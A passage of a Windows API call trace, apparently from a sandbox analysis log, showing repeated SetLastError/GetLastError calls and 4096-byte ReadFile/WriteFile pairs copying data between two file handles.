SetLastError (dwErrCode=0x0) [0104.199] GetLastError () returned 0x0 [0104.199] SetLastError (dwErrCode=0x0) [0104.199] GetLastError () returned 0x0 [0104.199] SetLastError (dwErrCode=0x0) [0104.199] GetLastError () returned 0x0 [0104.199] SetLastError (dwErrCode=0x0) [0104.199] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.199] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.199] GetLastError () returned 0x0 [0104.199] SetLastError (dwErrCode=0x0) [0104.200] GetLastError () returned 0x0 [0104.200] SetLastError (dwErrCode=0x0) [0104.200] GetLastError () returned 0x0 [0104.200] SetLastError (dwErrCode=0x0) [0104.200] GetLastError () returned 0x0 [0104.200] SetLastError (dwErrCode=0x0) [0104.200] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.200] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.200] GetLastError () returned 0x0 [0104.200] SetLastError (dwErrCode=0x0) [0104.200] GetLastError () returned 0x0 [0104.200] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.201] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.201] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.201] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.201] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] SetLastError (dwErrCode=0x0) [0104.201] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.202] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.202] SetLastError (dwErrCode=0x0) [0104.202] SetLastError (dwErrCode=0x0) [0104.202] SetLastError (dwErrCode=0x0) [0104.202] SetLastError (dwErrCode=0x0) [0104.202] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.202] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.202] SetLastError (dwErrCode=0x0) [0104.202] SetLastError (dwErrCode=0x0) [0104.202] SetLastError (dwErrCode=0x0) [0104.202] SetLastError (dwErrCode=0x0) [0104.202] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.202] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.202] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.203] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.203] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] SetLastError (dwErrCode=0x0) [0104.203] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.204] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.204] SetLastError (dwErrCode=0x0) [0104.204] SetLastError (dwErrCode=0x0) [0104.204] SetLastError (dwErrCode=0x0) [0104.204] SetLastError (dwErrCode=0x0) [0104.204] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.204] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.204] SetLastError (dwErrCode=0x0) [0104.204] SetLastError (dwErrCode=0x0) [0104.204] SetLastError (dwErrCode=0x0) [0104.204] SetLastError (dwErrCode=0x0) [0104.204] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.204] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.205] SetLastError (dwErrCode=0x0) [0104.205] SetLastError (dwErrCode=0x0) [0104.205] SetLastError (dwErrCode=0x0) [0104.205] SetLastError (dwErrCode=0x0) [0104.205] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.205] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.205] SetLastError (dwErrCode=0x0) [0104.205] SetLastError (dwErrCode=0x0) [0104.205] SetLastError (dwErrCode=0x0) [0104.205] SetLastError (dwErrCode=0x0) [0104.205] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.205] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.205] SetLastError (dwErrCode=0x0) [0104.205] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.206] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.206] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.206] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.206] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] SetLastError (dwErrCode=0x0) [0104.206] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.206] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.207] SetLastError (dwErrCode=0x0) [0104.207] SetLastError (dwErrCode=0x0) [0104.207] SetLastError (dwErrCode=0x0) [0104.207] SetLastError (dwErrCode=0x0) [0104.207] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.207] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.207] SetLastError (dwErrCode=0x0) [0104.207] SetLastError (dwErrCode=0x0) [0104.207] SetLastError (dwErrCode=0x0) [0104.207] SetLastError (dwErrCode=0x0) [0104.207] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.207] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.208] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.208] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.208] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.208] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.208] SetLastError (dwErrCode=0x0) [0104.209] SetLastError (dwErrCode=0x0) [0104.209] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.209] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.209] SetLastError (dwErrCode=0x0) [0104.209] SetLastError (dwErrCode=0x0) [0104.209] SetLastError (dwErrCode=0x0) [0104.209] SetLastError (dwErrCode=0x0) [0104.209] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.209] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.209] SetLastError (dwErrCode=0x0) [0104.209] SetLastError (dwErrCode=0x0) [0104.209] SetLastError (dwErrCode=0x0) [0104.209] SetLastError (dwErrCode=0x0) [0104.209] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.210] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.210] SetLastError (dwErrCode=0x0) [0104.210] SetLastError (dwErrCode=0x0) [0104.210] SetLastError (dwErrCode=0x0) [0104.210] SetLastError (dwErrCode=0x0) [0104.210] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.211] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.211] SetLastError (dwErrCode=0x0) [0104.211] SetLastError (dwErrCode=0x0) [0104.211] SetLastError (dwErrCode=0x0) [0104.211] SetLastError (dwErrCode=0x0) [0104.211] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.211] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.211] SetLastError (dwErrCode=0x0) [0104.211] SetLastError (dwErrCode=0x0) [0104.211] SetLastError (dwErrCode=0x0) [0104.211] SetLastError (dwErrCode=0x0) [0104.211] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.211] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.212] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.212] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.212] SetLastError (dwErrCode=0x0) [0104.213] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.213] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.213] SetLastError (dwErrCode=0x0) [0104.213] SetLastError (dwErrCode=0x0) [0104.213] SetLastError (dwErrCode=0x0) [0104.213] SetLastError (dwErrCode=0x0) [0104.213] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.213] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.213] SetLastError (dwErrCode=0x0) [0104.213] SetLastError (dwErrCode=0x0) [0104.213] SetLastError (dwErrCode=0x0) [0104.213] SetLastError (dwErrCode=0x0) [0104.213] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.213] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.214] SetLastError (dwErrCode=0x0) [0104.214] SetLastError (dwErrCode=0x0) [0104.214] SetLastError (dwErrCode=0x0) [0104.214] SetLastError (dwErrCode=0x0) [0104.214] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.214] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.214] SetLastError (dwErrCode=0x0) [0104.214] SetLastError (dwErrCode=0x0) [0104.214] SetLastError (dwErrCode=0x0) [0104.214] SetLastError (dwErrCode=0x0) [0104.214] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.214] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.215] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.215] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.215] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.215] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.215] SetLastError (dwErrCode=0x0) [0104.216] SetLastError (dwErrCode=0x0) [0104.216] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.216] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.216] SetLastError (dwErrCode=0x0) [0104.216] SetLastError (dwErrCode=0x0) [0104.216] SetLastError (dwErrCode=0x0) [0104.216] SetLastError (dwErrCode=0x0) [0104.216] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.216] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.216] SetLastError (dwErrCode=0x0) [0104.216] SetLastError (dwErrCode=0x0) [0104.216] 